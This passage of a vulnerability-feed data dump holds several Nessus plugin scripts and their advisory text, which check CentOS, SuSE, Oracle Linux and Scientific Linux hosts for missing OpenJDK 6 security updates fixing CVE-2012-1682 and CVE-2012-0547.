OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 25, "published": "2012-09-04T00:00:00", "title": "CentOS 5 : java-1.6.0-openjdk (CESA-2012:1222)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2012-09-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-1.6.0-openjdk", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo", "p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2012-1222.NASL", "href": "https://www.tenable.com/plugins/nessus/61754", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1222 and \n# CentOS Errata and Security Advisory 2012:1222 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61754);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_bugtraq_id(55336, 55339);\n script_xref(name:\"RHSA\", value:\"2012:1222\");\n\n script_name(english:\"CentOS 5 : java-1.6.0-openjdk (CESA-2012:1222)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-September/018840.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?315ca813\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1682\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:39:21", "description": "The following security issues have been fixed :\n\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references", "edition": 17, "published": "2013-01-25T00:00:00", "title": "SuSE 11.2 Security Update : OpenJDK (SAT Patch Number 6772)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk-devel", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk-demo"], "id": "SUSE_11_JAVA-1_6_0-OPENJDK-120905.NASL", "href": "https://www.tenable.com/plugins/nessus/64168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64168);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n\n script_name(english:\"SuSE 11.2 Security Update : OpenJDK (SAT Patch Number 6772)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following security issues have been fixed :\n\n - S7162476, CVE-2012-1682: XMLDecoder security issue via\n ClassFinder\n\n - S7163201, CVE-2012-0547: Simplify toolkit internals\n references\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=777499\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0547.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1682.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6772.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"java-1_6_0-openjdk-1.6.0.0_b24.1.11.4-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"java-1_6_0-openjdk-demo-1.6.0.0_b24.1.11.4-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"java-1_6_0-openjdk-devel-1.6.0.0_b24.1.11.4-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"java-1_6_0-openjdk-1.6.0.0_b24.1.11.4-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"java-1_6_0-openjdk-demo-1.6.0.0_b24.1.11.4-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"java-1_6_0-openjdk-devel-1.6.0.0_b24.1.11.4-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:07", "description": "From Red Hat Security Advisory 2012:1222 :\n\nUpdated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : java-1.6.0-openjdk (ELSA-2012-1222)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk", "p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc"], "id": "ORACLELINUX_ELSA-2012-1222.NASL", "href": "https://www.tenable.com/plugins/nessus/68610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:1222 and \n# Oracle Linux Security Advisory ELSA-2012-1222 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68610);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_bugtraq_id(55336, 55339);\n script_xref(name:\"RHSA\", value:\"2012:1222\");\n\n script_name(english:\"Oracle Linux 5 : java-1.6.0-openjdk (ELSA-2012-1222)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:1222 :\n\nUpdated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-September/003007.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.28.1.10.9.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.28.1.10.9.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.28.1.10.9.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.28.1.10.9.0.1.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.28.1.10.9.0.1.el5_8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:47", "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 14, "published": "2012-09-05T00:00:00", "title": "Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x i386/x86_64 (20120903)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "modified": "2012-09-05T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk", "p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-demo", "p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-src", "p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-javadoc", "p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120903_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61784);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n\n script_name(english:\"Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x i386/x86_64 (20120903)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet\ncould use this flaw to use classes from restricted packages, allowing\nit to bypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1209&L=scientific-linux-errata&T=0&P=80\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fdb0ab5f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.28.1.10.9.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:11:04", "description": "Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and 